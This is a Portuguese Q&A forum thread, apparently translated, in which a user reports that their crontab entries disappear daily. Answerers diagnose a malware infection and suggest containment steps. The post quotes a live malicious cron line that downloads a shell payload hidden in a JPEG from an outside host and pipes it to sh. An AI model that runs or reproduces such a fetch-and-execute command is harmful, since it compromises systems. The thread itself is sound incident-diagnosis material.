Crontab Entries no meu Linux está sendo deletado todos os dias. Eu adicionei as entradas e no dia seguinte quando eu verificar tudo que eu consegui encontrar é:
*/60 * * * * curl https://ooo.0o0.ooo/2017/01/21/58837a6d11262.jpg -k|dd skip=3458 bs=1|sh
Mesmo tempo, as entradas do crontab no usuário root ainda estão lá. Alguém pode ajudar, como a minha equipe de TI em si não está ciente. Alguém pode ajudar?
Uma entrada crontab que faz o download de um script de shell (disfarçado em um JPEG não menos) e o executa sugere strongmente que seu sistema foi comprometido. Você deve desligar o computador afetado e perguntar a sua equipe de TI o que fazer com ele.
(O comprometimento explicaria suas entradas crontab desaparecidas - presumivelmente, qualquer malware que você inadvertidamente hospede reescreve o crontab.)
Seu sistema foi infectado com um vírus 'lady linux', você precisa otimizar a segurança. verifique a pasta '/ tmp' para arquivos misteriosos, e bloqueie as portas TCP / UDP sem uso, e bloqueie o destino de saída ooo.0o0.ooo, para seus servidores. No entanto, deve ser difícil encontrar a raiz do problema.